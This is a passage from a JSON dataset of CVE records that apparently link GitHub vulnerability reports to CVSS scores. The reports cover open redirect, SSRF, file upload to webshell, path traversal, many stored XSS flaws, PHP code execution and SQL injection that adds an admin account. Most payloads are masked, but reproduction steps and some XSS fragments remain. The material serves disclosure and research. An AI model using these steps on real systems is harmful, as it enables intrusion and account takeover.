  55128. "description": "URL open redirect leads to phishing attacks. Important notices Before you add a new report, we ask you kindly to acknowledge the following: [ ] I have read the contributing guide lines at FILETAG [ ] I have searched the existing issues and I'm convinced that mine is new. Describe the bug Redirect URL in login page was not filtered and can redirect user to any website. Attackers can send a URL like APITAG to firewall user. If user enter the credential and login, he will be redirected to malicious page To Reproduce Steps to reproduce the behavior NUMBERTAG Access APITAG NUMBERTAG Enter the credential NUMBERTAG User was redirected to APITAG Environment APITAG NUMBERTAG amd NUMBERTAG APITAG NUMBERTAG RELEASE p NUMBERTAG HBSD APITAG NUMBERTAG d NUMBERTAG Sep NUMBERTAG",
  55129. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  55130. "severity": "MEDIUM",
  55131. "baseScore": 6.1,
  55132. "impactScore": 2.7,
  55133. "exploitabilityScore": 2.8
  55134. },
  55135. {
  55136. "CVE_ID": "CVE-2020-23079",
  55137. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/806",
  55138. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/806",
  55139. "Repo_new": "halo-dev/halo",
  55140. "Issue_Created_At": "2020-04-29T08:03:08Z",
  55141. "description": "SSRF vulnerability exists at the SMTP configuration, which can detect the server intranet. APITAG the password of the login account of the system background is transmitted in plain text, it can easily enter the background through brute force cracking\uff1a APITAG problem lies in the STMP server configuration\uff0cwhich can specify host address and port FILETAG APITAG is a hidden APITAG () interface in the code to test the connectivity of the mailbox server FILETAG NUMBERTAG It is a APITAG that depends on springframework\uff1a FILETAG NUMBERTAG So you can test through this interface, write the address as APITAG the server port is open, the corresponding time is shorter NUMBERTAG millis\uff1a FILETAG APITAG port is not open, the corresponding time is longer NUMBERTAG millis\uff1a FILETAG APITAG can obtain the open ports of the server and other hosts on the intranet in batches according to the length of the echo time, and then carry out further attacks",
  55142. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  55143. "severity": "HIGH",
  55144. "baseScore": 7.5,
  55145. "impactScore": 3.6,
  55146. "exploitabilityScore": 3.9
  55147. },
  55148. {
  55149. "CVE_ID": "CVE-2020-23083",
  55150. "Issue_Url_old": "https://github.com/zhangdaiscott/jeecg/issues/56",
  55151. "Issue_Url_new": "https://github.com/zhangdaiscott/jeecg/issues/56",
  55152. "Repo_new": "zhangdaiscott/jeecg",
  55153. "Issue_Created_At": "2020-04-30T02:52:25Z",
  55154. "description": "jeecg NUMBERTAG file upload vulnerability. In landing APITAG the APITAG the allowed file suffix first URLTAG FILETAG The system only does the front end check to the upload file\uff0cwe can use burp to grab bag\uff0cchange the suffix of file name to APITAG you can upload it successfully FILETAG The uploaded address is as follows\uff0cwe can use the upload vulnerability to get a webshell FILETAG FILETAG",
  55155. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  55156. "severity": "CRITICAL",
  55157. "baseScore": 9.8,
  55158. "impactScore": 5.9,
  55159. "exploitabilityScore": 3.9
  55160. },
  55161. {
  55162. "CVE_ID": "CVE-2020-23109",
  55163. "Issue_Url_old": "https://github.com/strukturag/libheif/issues/207",
  55164. "Issue_Url_new": "https://github.com/strukturag/libheif/issues/207",
  55165. "Repo_new": "strukturag/libheif",
  55166. "Issue_Created_At": "2020-02-24T02:04:49Z",
  55167. "description": "Heap overflow in APITAG I spotted this overflow in APITAG . how to reproduce: APITAG FILETAG Here is the report of ASAN ERRORTAG",
  55168. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  55169. "severity": "HIGH",
  55170. "baseScore": 8.1,
  55171. "impactScore": 5.2,
  55172. "exploitabilityScore": 2.8
  55173. },
  55174. {
  55175. "CVE_ID": "CVE-2020-23171",
  55176. "Issue_Url_old": "https://github.com/nim-lang/zip/issues/54",
  55177. "Issue_Url_new": "https://github.com/nim-lang/zip/issues/54",
  55178. "Repo_new": "nim-lang/zip",
  55179. "Issue_Created_At": "2020-05-10T02:44:06Z",
  55180. "description": "Directory traversal vulnerability from libzip. Issue Given a crafted zip file containing a file of filename APITAG , zip will extract the file to APITAG , while actually it should be extracted to APITAG . This vulnerability could allow the attacker to write a file to an arbitrary directory. How to reproduce You can try to reproduce this vulnerability using FILETAG , you can find the APITAG here URLTAG",
  55181. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  55182. "severity": "MEDIUM",
  55183. "baseScore": 5.5,
  55184. "impactScore": 3.6,
  55185. "exploitabilityScore": 1.8
  55186. },
  55187. {
  55188. "CVE_ID": "CVE-2020-23172",
  55189. "Issue_Url_old": "https://github.com/kuba--/zip/issues/123",
  55190. "Issue_Url_new": "https://github.com/kuba--/zip/issues/123",
  55191. "Repo_new": "kuba--/zip",
  55192. "Issue_Created_At": "2020-05-09T15:30:27Z",
  55193. "description": "Directory traversal vulnerability when handling crafted zip file. On the latest version NUMBERTAG and the master branch of zip: there is a vulnerability that can be triggered by a crafted zip file, specifically, a file with filename such as APITAG will be extracted as APITAG , while the correct way is APITAG . To reproduce the issue, you may try to extract this FILETAG , which contains two files APITAG and APITAG . Here is the APITAG repo] ( URLTAG This root cause is that zip doesn't normalize the path in APITAG in APITAG . I will try to send a pull request to fix it later.",
  55194. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  55195. "severity": "MEDIUM",
  55196. "baseScore": 5.5,
  55197. "impactScore": 3.6,
  55198. "exploitabilityScore": 1.8
  55199. },
  55200. {
  55201. "CVE_ID": "CVE-2020-23190",
  55202. "Issue_Url_old": "https://github.com/phpList/phplist3/issues/667",
  55203. "Issue_Url_new": "https://github.com/phplist/phplist3/issues/667",
  55204. "Repo_new": "phplist/phplist3",
  55205. "Issue_Created_At": "2020-05-26T04:03:24Z",
  55206. "description": "Cross Site Scripting Vulnerability on APITAG Mail\" feature in Lavelite. Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Mail\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click \"import by uploading a file with emails NUMBERTAG Insert payload: APITAG APITAG load=alert('XSS')// APITAG NUMBERTAG Click APITAG NUMBERTAG iew the preview to trigger XSS NUMBERTAG iew the preview to get in request and such Stored XSS Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is stored back to the page. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots FILETAG FILETAG FILETAG Desktop (please complete the following information): OS: Windows Browser: Firefox Version NUMBERTAG",
  55207. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  55208. "severity": "MEDIUM",
  55209. "baseScore": 5.4,
  55210. "impactScore": 2.7,
  55211. "exploitabilityScore": 2.3
  55212. },
  55213. {
  55214. "CVE_ID": "CVE-2020-23192",
  55215. "Issue_Url_old": "https://github.com/phpList/phplist3/issues/671",
  55216. "Issue_Url_new": "https://github.com/phplist/phplist3/issues/671",
  55217. "Repo_new": "phplist/phplist3",
  55218. "Issue_Created_At": "2020-05-29T16:45:03Z",
  55219. "description": "Cross Site Scripting Vulnerability on APITAG administrators\" feature in APITAG NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG administrators\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG administrators NUMBERTAG Click \"admin\" edit infomation admin NUMBERTAG Insert payload: \"> APITAG FILETAG // \"> APITAG NUMBERTAG Click APITAG Changes NUMBERTAG iew the preview to trigger XSS NUMBERTAG iew the preview to get in request and such Stored XSS Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is stored back to the page. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots FILETAG Insert payload FILETAG Click APITAG Changes\" > Click APITAG of administrator\" > View Stored XSS FILETAG Desktop (please complete the following information): OS: Windows Browser: Firefox Version NUMBERTAG",
  55220. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  55221. "severity": "MEDIUM",
  55222. "baseScore": 5.4,
  55223. "impactScore": 2.7,
  55224. "exploitabilityScore": 2.3
  55225. },
  55226. {
  55227. "CVE_ID": "CVE-2020-23194",
  55228. "Issue_Url_old": "https://github.com/phpList/phplist3/issues/678",
  55229. "Issue_Url_new": "https://github.com/phplist/phplist3/issues/678",
  55230. "Repo_new": "phplist/phplist3",
  55231. "Issue_Created_At": "2020-06-07T14:34:39Z",
  55232. "description": "Cross Site Scripting Vulnerability on APITAG subscribers\" feature in APITAG NUMBERTAG upload file SVG.. Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG subscribers\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG NUMBERTAG Import payload file SVG: FILETAG NUMBERTAG Click button APITAG NUMBERTAG Click select APITAG NUMBERTAG Click button \"CONTINUE NUMBERTAG iew the preview to trigger XSS NUMBERTAG iew the preview to get in request and such Stored XSS. Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is stored back to the page. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots FILETAG FILETAG FILETAG Trigger XSS FILETAG Desktop (please complete the following information): OS: Ubuntu Browser: Firefox Version NUMBERTAG",
  55233. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  55234. "severity": "MEDIUM",
  55235. "baseScore": 5.4,
  55236. "impactScore": 2.7,
  55237. "exploitabilityScore": 2.3
  55238. },
  55239. {
  55240. "CVE_ID": "CVE-2020-23205",
  55241. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/465",
  55242. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/465",
  55243. "Repo_new": "monstra-cms/monstra",
  55244. "Issue_Created_At": "2020-05-22T18:18:39Z",
  55245. "description": "Cross Site Script Vulnerability on APITAG Settings\" in Monstra version NUMBERTAG Hii, Team Monstra!!! Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Settings\" feature Monstra. To Reproduce Steps to reproduce the behavior: APITAG into the panel Monstra NUMBERTAG Go to APITAG NUMBERTAG Click APITAG > APITAG NUMBERTAG Insert Payload XSS: \"> APITAG '> APITAG // \"> APITAG APITAG APITAG load=alert NUMBERTAG APITAG NUMBERTAG Save NUMBERTAG click View Site > xss alert message! Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots a. Infor Monstra version: FILETAG b. insert payload xss: FILETAG c. view site > xss alert message FILETAG Desktop (please complete the following information): OS: Windows Browser: All Version: I Hope you fix it ASAP!!!!",
  55246. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  55247. "severity": "MEDIUM",
  55248. "baseScore": 5.4,
  55249. "impactScore": 2.7,
  55250. "exploitabilityScore": 2.3
  55251. },
  55252. {
  55253. "CVE_ID": "CVE-2020-23207",
  55254. "Issue_Url_old": "https://github.com/phpList/phplist3/issues/664",
  55255. "Issue_Url_new": "https://github.com/phplist/phplist3/issues/664",
  55256. "Repo_new": "phplist/phplist3",
  55257. "Issue_Created_At": "2020-05-25T04:25:57Z",
  55258. "description": "Cross Site Script Vulnerability on APITAG Attributes\" feature in phplist version NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the \"configure attributes\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the panel phplist NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG Values' > APITAG new NUMBERTAG Insert Payload XSS: '> APITAG NUMBERTAG Add new Woonplaats NUMBERTAG ss alert message Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Screenhost NUMBERTAG login FILETAG NUMBERTAG Add new FILETAG NUMBERTAG Insert payload xss FILETAG NUMBERTAG ss alert message FILETAG Desktop (please complete the following information): OS: Windows Browser: All Version I Hope you fix it ASAP",
  55259. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  55260. "severity": "MEDIUM",
  55261. "baseScore": 5.4,
  55262. "impactScore": 2.7,
  55263. "exploitabilityScore": 2.3
  55264. },
  55265. {
  55266. "CVE_ID": "CVE-2020-23208",
  55267. "Issue_Url_old": "https://github.com/phpList/phplist3/issues/665",
  55268. "Issue_Url_new": "https://github.com/phplist/phplist3/issues/665",
  55269. "Repo_new": "phplist/phplist3",
  55270. "Issue_Created_At": "2020-05-25T04:59:40Z",
  55271. "description": "Cross Site Script Vulnerability on APITAG a Campaign\" feature in phplist version NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG a Campaign\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the panel phplist NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG or continue a campaign' > 'no title NUMBERTAG Insert Payload XSS: 'to email address(es)' // \"> APITAG FILETAG NUMBERTAG Next NUMBERTAG ss alert message Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Screnhost FILETAG FILETAG FILETAG Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Desktop (please complete the following information): OS: Windows Browser: All Version I Hope you fix it ASAP",
  55272. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  55273. "severity": "MEDIUM",
  55274. "baseScore": 5.4,
  55275. "impactScore": 2.7,
  55276. "exploitabilityScore": 2.3
  55277. },
  55278. {
  55279. "CVE_ID": "CVE-2020-23209",
  55280. "Issue_Url_old": "https://github.com/phpList/phplist3/issues/666",
  55281. "Issue_Url_new": "https://github.com/phplist/phplist3/issues/666",
  55282. "Repo_new": "phplist/phplist3",
  55283. "Issue_Created_At": "2020-05-25T18:43:58Z",
  55284. "description": "Cross Site Script Vulnerability on APITAG Lists\" feature in phplist version NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Lists\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the panel phplist NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG Lists' > APITAG a lists NUMBERTAG Insert Payload XSS: 'to email address(es)' '> APITAG NUMBERTAG Save > Click APITAG > APITAG some subscribers NUMBERTAG ss alert message Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Screnhost FILETAG FILETAG FILETAG FILETAG FILETAG Also Video APITAG URLTAG Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Desktop (please complete the following information): OS: Windows Browser: All Version I Hope you fix it ASAP!!!",
  55285. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  55286. "severity": "MEDIUM",
  55287. "baseScore": 5.4,
  55288. "impactScore": 2.7,
  55289. "exploitabilityScore": 2.3
  55290. },
  55291. {
  55292. "CVE_ID": "CVE-2020-23214",
  55293. "Issue_Url_old": "https://github.com/phpList/phplist3/issues/669",
  55294. "Issue_Url_new": "https://github.com/phplist/phplist3/issues/669",
  55295. "Repo_new": "phplist/phplist3",
  55296. "Issue_Created_At": "2020-05-27T16:15:59Z",
  55297. "description": "Cross Site Script Vulnerability on APITAG Lists\" feature in phplist version NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Lists\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the panel phplist NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG Lists' > APITAG Lists' > APITAG Categories NUMBERTAG Insert Payload XSS: '> APITAG NUMBERTAG Save and Back > click chose 'CATEGORY' new > Save > click Subscribers NUMBERTAG ss alert message Screenhost FILETAG FILETAG FILETAG FILETAG FILETAG Also Video APITAG URLTAG Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Desktop (please complete the following information): OS: Windows Browser: All Version I Hope you fix it ASAP!!!",
  55298. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  55299. "severity": "MEDIUM",
  55300. "baseScore": 5.4,
  55301. "impactScore": 2.7,
  55302. "exploitabilityScore": 2.3
  55303. },
  55304. {
  55305. "CVE_ID": "CVE-2020-23217",
  55306. "Issue_Url_old": "https://github.com/phpList/phplist3/issues/672",
  55307. "Issue_Url_new": "https://github.com/phplist/phplist3/issues/672",
  55308. "Repo_new": "phplist/phplist3",
  55309. "Issue_Created_At": "2020-05-30T11:15:26Z",
  55310. "description": "Bypass Cross Site Scripting Vulnerability on \"IMPORT EMAILS\" feature in php list NUMBERTAG Hi Team phplist3, I found a small bug! Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the \"IMPORT EMAILS\" feature. It affects both options SEND A CAMPAIGN feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the panel phplist NUMBERTAG Go to PATHTAG NUMBERTAG Chose APITAG > Click APITAG some subscribers' > Chose NUMBERTAG options APITAG and paste list of emails) > APITAG a list NUMBERTAG Insert Payload XSS: APITAG X APITAG FILETAG NUMBERTAG Save NUMBERTAG ss alert message Screenhost FILETAG FILETAG FILETAG FILETAG Also Video APITAG URLTAG Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Desktop (please complete the following information): OS: Windows Browser: All Version I Hope you fix it ASAP!!!",
  55311. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  55312. "severity": "MEDIUM",
  55313. "baseScore": 5.4,
  55314. "impactScore": 2.7,
  55315. "exploitabilityScore": 2.3
  55316. },
  55317. {
  55318. "CVE_ID": "CVE-2020-23219",
  55319. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/466",
  55320. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/466",
  55321. "Repo_new": "monstra-cms/monstra",
  55322. "Issue_Created_At": "2020-05-22T19:16:40Z",
  55323. "description": "Remote Code Execution via Snippets module in Monstra version NUMBERTAG Describe the bug An attacker could insert any executable code through php via Snippets Module to execution command in the server To Reproduce NUMBERTAG Log into the panel NUMBERTAG Go to APITAG NUMBERTAG Click edit NUMBERTAG Insert payload APITAG NUMBERTAG output); ?> APITAG APITAG NUMBERTAG Save and Exit NUMBERTAG Go to index view Screenhost FILETAG FILETAG",
  55324. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  55325. "severity": "HIGH",
  55326. "baseScore": 8.8,
  55327. "impactScore": 5.9,
  55328. "exploitabilityScore": 2.8
  55329. },
  55330. {
  55331. "CVE_ID": "CVE-2020-23226",
  55332. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3549",
  55333. "Issue_Url_new": "https://github.com/cacti/cacti/issues/3549",
  55334. "Repo_new": "cacti/cacti",
  55335. "Issue_Created_At": "2020-05-10T18:12:32Z",
  55336. "description": "Several XSS Vulnerabilities. Describe the bug Several XSS Vulnerabilities during XSS testing To Reproduce Case NUMBERTAG Go to APITAG NUMBERTAG APITAG a report NUMBERTAG Add a APITAG item with Fixed Text APITAG NUMBERTAG Click save, and then return to Item list NUMBERTAG See error, popup APITAG as below FILETAG NUMBERTAG Click APITAG tab NUMBERTAG See error again. Case NUMBERTAG Go to APITAG > Data Collection > Data Queries NUMBERTAG Select a data query, and click name to edit it NUMBERTAG Click name of one of Associated Graph Templates NUMBERTAG Modify name to APITAG NUMBERTAG Click Save button, then click Return button NUMBERTAG Click x icon of row right for the modified one NUMBERTAG See error, popup APITAG as below FILETAG Case3 FILETAG , delete,click a output/input field with APITAG alert('test CVE'); APITAG Case4 FILETAG add graph items with a color named APITAG alert('test CVE'); APITAG Case5 FILETAG add tree with APITAG alert('test CVE'); APITAG Case6 aggregate graph place on a tree named with APITAG alert('test CVE'); APITAG Desktop (please complete the following information) OS: Windows NUMBERTAG Browser: Firefox Version NUMBERTAG ESR",
  55337. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  55338. "severity": "MEDIUM",
  55339. "baseScore": 6.1,
  55340. "impactScore": 2.7,
  55341. "exploitabilityScore": 2.8
  55342. },
  55343. {
  55344. "CVE_ID": "CVE-2020-23234",
  55345. "Issue_Url_old": "https://github.com/LavaLite/cms/issues/320",
  55346. "Issue_Url_new": "https://github.com/lavalite/cms/issues/320",
  55347. "Repo_new": "lavalite/cms",
  55348. "Issue_Created_At": "2020-05-21T02:42:23Z",
  55349. "description": "Cross Site Scripting Vulnerability on APITAG Links\" feature in APITAG NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Blocks\" feature. This was can be bypassed by using HTML event handlers, such as \"ontoggle\". To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the /admin NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG NUMBERTAG Select a function then press New NUMBERTAG Insert payload to Name: '> APITAG FILETAG NUMBERTAG Click APITAG NUMBERTAG iew the preview to trigger XSS NUMBERTAG iew the preview to get in request and such Stored XSS FILETAG Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site.",
  55350. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  55351. "severity": "MEDIUM",
  55352. "baseScore": 4.8,
  55353. "impactScore": 2.7,
  55354. "exploitabilityScore": 1.7
  55355. },
  55356. {
  55357. "CVE_ID": "CVE-2020-23238",
  55358. "Issue_Url_old": "https://github.com/evolution-cms/evolution/issues/1473",
  55359. "Issue_Url_new": "https://github.com/evolution-cms/evolution/issues/1473",
  55360. "Repo_new": "evolution-cms/evolution",
  55361. "Issue_Created_At": "2020-06-01T07:24:09Z",
  55362. "description": "Cross Site Scripting Vulnerability on APITAG Manager\" feature in Evolution NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Reflected XSS vulnerability in the APITAG Manager\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the /manager NUMBERTAG Go to APITAG Manager\" on Modules FILETAG NUMBERTAG Insert payload: '> APITAG FILETAG NUMBERTAG Click APITAG FILETAG Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Versions Evolution CMS NUMBERTAG",
  55363. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  55364. "severity": "MEDIUM",
  55365. "baseScore": 5.4,
  55366. "impactScore": 2.7,
  55367. "exploitabilityScore": 2.3
  55368. },
  55369. {
  55370. "CVE_ID": "CVE-2020-23239",
  55371. "Issue_Url_old": "https://github.com/textpattern/textpattern/issues/1495",
  55372. "Issue_Url_new": "https://github.com/textpattern/textpattern/issues/1495",
  55373. "Repo_new": "textpattern/textpattern",
  55374. "Issue_Created_At": "2020-06-08T04:30:19Z",
  55375. "description": "Cross Site Scripting Vulnerability on APITAG Preferences\" feature in Textpattern NUMBERTAG Expected behaviour An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Preferences\" feature. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Steps to reproduce NUMBERTAG Log into the Admin NUMBERTAG Go to APITAG Preferences\" FILETAG NUMBERTAG Click APITAG fields\" FILETAG NUMBERTAG Insert payload to Fields name: '> APITAG NUMBERTAG Click Icon Textpattern: FILETAG FILETAG Additional information Textpattern version NUMBERTAG",
  55376. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  55377. "severity": "MEDIUM",
  55378. "baseScore": 4.8,
  55379. "impactScore": 2.7,
  55380. "exploitabilityScore": 1.7
  55381. },
  55382. {
  55383. "CVE_ID": "CVE-2020-23242",
  55384. "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/16",
  55385. "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/16",
  55386. "Repo_new": "navigatecms/navigate-cms",
  55387. "Issue_Created_At": "2020-06-18T10:57:00Z",
  55388. "description": "Cross Site Script Vulnerability on APITAG feature in APITAG NUMBERTAG Expected behaviour An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Steps to reproduce NUMBERTAG Log into the Admin NUMBERTAG Go to function APITAG NUMBERTAG Click Web users FILETAG NUMBERTAG Perform APITAG or APITAG FILETAG NUMBERTAG Add payload in name via Personal: '> APITAG NUMBERTAG Load web: FILETAG APITAG NUMBERTAG",
  55389. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  55390. "severity": "MEDIUM",
  55391. "baseScore": 4.8,
  55392. "impactScore": 2.7,
  55393. "exploitabilityScore": 1.7
  55394. },
  55395. {
  55396. "CVE_ID": "CVE-2020-23243",
  55397. "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/18",
  55398. "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/18",
  55399. "Repo_new": "navigatecms/navigate-cms",
  55400. "Issue_Created_At": "2020-06-19T04:12:30Z",
  55401. "description": "Cross Site Script Vulnerability APITAG NUMBERTAG Expected behaviour An authenticated malicious user can take advantage of a Reflected XSS vulnerability in the name=\"wrong_path_redirect\" feature. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Steps to reproduce NUMBERTAG Log into the Admin NUMBERTAG Go to function APITAG > Web sites NUMBERTAG Click website edit NUMBERTAG Use Burp Suite inject payload to name=\"wrong_path_redirect\" : FILETAG Request: URLTAG FILETAG",
  55402. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  55403. "severity": "MEDIUM",
  55404. "baseScore": 4.8,
  55405. "impactScore": 2.7,
  55406. "exploitabilityScore": 1.7
  55407. },
  55408. {
  55409. "CVE_ID": "CVE-2020-23262",
  55410. "Issue_Url_old": "https://github.com/ming-soft/MCMS/issues/45",
  55411. "Issue_Url_new": "https://github.com/ming-soft/mcms/issues/45",
  55412. "Repo_new": "ming-soft/mcms",
  55413. "Issue_Created_At": "2020-05-12T14:03:18Z",
  55414. "description": "Security issue SQL injection in /mcms/view.do. The vulnerable query is in FILETAG . PATHTAG CODETAG First we need to enumerate the param \"id\" from NUMBERTAG to NUMBERTAG If the id is empty , we will get an error: FILETAG FILETAG If the id is available , we will get a normal page : FILETAG In this case , i choose NUMBERTAG as the id , it's very easy to enumerate the id: FILETAG Then we can easily confirm there is a SQL injection with the following url: APITAG If the condition is true NUMBERTAG it will delay NUMBERTAG seconds: FILETAG If the condition is false NUMBERTAG it will respond immediately: FILETAG So it's a typical SQL Injection. And there will be a Stacked SQL Injection if someone using FILETAG because APITAG set to true. PATHTAG ERRORTAG Malicious user can easily inject an admin account (username:admin password:msopen) into database with following url: APITAG In my case the url is: APITAG FILETAG Login successfully : FILETAG",
  55415. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  55416. "severity": "CRITICAL",
  55417. "baseScore": 9.8,
  55418. "impactScore": 5.9,
  55419. "exploitabilityScore": 3.9
  55420. },
  55421. {
  55422. "CVE_ID": "CVE-2020-23266",
  55423. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1481",
  55424. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1481",
  55425. "Repo_new": "gpac/gpac",
  55426. "Issue_Created_At": "2020-05-12T18:18:19Z",
